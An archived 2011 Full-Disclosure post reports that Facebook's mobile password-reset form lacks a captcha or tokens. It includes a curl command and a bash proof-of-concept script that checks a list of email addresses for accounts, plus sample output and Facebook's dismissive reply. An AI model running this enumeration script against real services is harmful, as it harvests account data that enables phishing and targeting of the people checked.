lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Tue, 02 Aug 2011 11:53:26 -0400
From: "Zerial." <fernando@...ial.org>
To: full-disclosure@...ts.grok.org.uk
Subject: [Facebook] password recovery without a captcha
	nor security tokens

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Facebook doesn't ensures the user information may
not be collected by any bot or any automated process. Even though you
can protect from this kind of attacks using captchas or tokens security
into the forms.

Step by step:

- - Go to http://m.facebook.com

- - Go to "Forgot your password" (http://m.facebook.com/reset.php?refid=0)

- - Try using a real email address and try to use a fake email address,
you will see two differents behavior.

Well, now try to do a POST request to
http://m.facebook.com/reset.php?refid=0 passing a email address through
"ep" variable.

Using cURL:

curl -s -d "ep=test@...l.com" http://m.facebook.com/reset.php?refid=0


This process has no validation for external or forgery site/form.


Using the script:

#--------------------
#!/bin/bash
for mail in $(cat $1);
do
	s=$(curl -s -d "ep=$mail" http://m.facebook.com/reset.php?refid=0|grep
form>/dev/null);
	if [ $? -eq 0 ]; then
		echo "$mail No tiene cuenta.";
	else
		echo "$mail Si tiene cuenta.";
	fi
done

#+----- EOF ------+


You can ennumerate users by using a list of email address or phone numbers.

$ sh poc.sh mails.txt
putita666@...oo.com NO
chapalapachala@...il.com YES
esteban.gutierrez@...il.com YES
casatola@...il.com YES
casacasa@...il.com NO
berpnarf@...mail.com NO
asdfgsdfgerT@...fgh.com NO




Into the full version of facebook http://www.facebook.com this option is
protected by a captcha to verify that we are human, in the mobile,
version this validation doesn't exists. Facebooks says:

[copy&paste]
"Hi,

While this style of information disclosure vulnerability may be
applicable at a financial or banking website, it is a core part of
the experience on social networks that are designed to connect email
addresses to users. As another example, someone who desires to obtain
this type of information could first load all of the email addresses
into a throw-away email address book, and then utilize our contact
importer tool. Requiring the registration of an account would not
provide any significant additional friction.

Alex Security Facebook"


Details in
http://www.securitybydefault.com/2011/08/busqueda-automatizada-de-cuentas.html

Cheers,
- -- 
Zerial
Seguridad Informatica
GNU/Linux User #382319
Blog: http://blog.zerial.org
Jabber: zerial@...beres.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAk44HXUACgkQIP17Kywx9JTfzwCgmpOtiEirsLQhWBON05rbVNtH
XskAnAzjwC8gMJgajSUyEW7J7rxfjCZL
=hGpN
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ